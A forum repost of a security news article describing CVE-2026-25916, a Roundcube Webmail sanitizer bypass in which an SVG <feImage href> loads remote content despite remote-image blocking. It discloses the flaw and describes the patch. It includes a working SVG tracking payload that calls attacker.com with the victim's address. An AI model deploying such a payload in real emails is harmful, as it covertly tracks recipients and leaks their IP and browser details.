« previous next »
Pages: [1]

Author Topic: Roundcube Webmail Vulnerability Lets Attackers Track Email Opens  (Read 15 times)

0 Members and 1 Guest are viewing this topic.

Offline
Starburst
*****
Roundcube Webmail Vulnerability Lets Attackers Track Email Opens
« on: February 09, 2026, 06:24:31 PM »
Source: Cyber Press https://cyberpress.org/roundcube-webmail-vulnerability-lets-attackers-track-email-opens/

In a sneaky bypass of email security features, a vulnerability in Roundcube Webmail exposes users to hidden tracking even when “Block remote images” is enabled.

Discovered during holiday tinkering, this issue (CVE-2026-25916) affects versions before 1.5.13 and 1.6.13.

Attackers can now confirm if you’ve opened their emails, logging your IP address and browser details without your knowledge.

The Problem in Plain Terms
Roundcube’s HTML sanitizer is like a bouncer at a club. It blocks external images in common spots: <img src>, <image href>, and <use href>.

These checks use a strict function called is_image_attribute() that rejects outside URLs when remote loading is off.

But the SVG element <feImage> slipped through. Its href attribute meant to pull in remote images for filters, gets treated as a harmless link instead.

The sanitizer routes it via wash_link(), which allows HTTP/HTTPS URLs. Result? Browsers fetch the attacker’s image invisibly, bypassing the block.

Security researcher “nullcathedral” spotted this while auditing recent SVG fixes in Roundcube’s rcube_washtml.php.

One SVG bug often hints at more, and <feImage> stood out because it renders like an <img> but dodges the image checks.

How Attackers Exploit It
Imagine receiving this malicious HTML in an email:

Code: [Select]
text<svg width="1" height="1" style="position:absolute;left:-9999px;">
  <defs>
    <filter id="t">
      <feImage href="https://attacker.com/track?email=victim@test.com" width="1" height="1"/>
    </filter>
  </defs>
  <rect filter="url(#t)" width="1" height="1"/>
</svg>
It’s a tiny, off-screen SVG. When rendered, the browser grabs the href image, pinging the attacker’s server.

No click required, just opening the email triggers it. Perfect for phishing campaigns or spam tracking.

CVE Details
Field   Value
CVE   CVE-2026-25916
Vendor   Roundcube
Product   Roundcube Webmail
Affected Versions   <1.5.13, <1.6.13
Disclosure Date   2026-02-08
Developers patched it swiftly. The update tweaks is_image_attribute() with a regex: ($attr == 'href' && preg_match('/^(feimage\|image\|use)$/i', $tag)). Now <feImage href> gets blocked like other images.

2026-01-04: Reported to Roundcube.
2026-02-08: Versions 1.5.13 and 1.6.13 released.
2026-02-09: CVE assigned.
Logged
Pages: [1]
« previous next »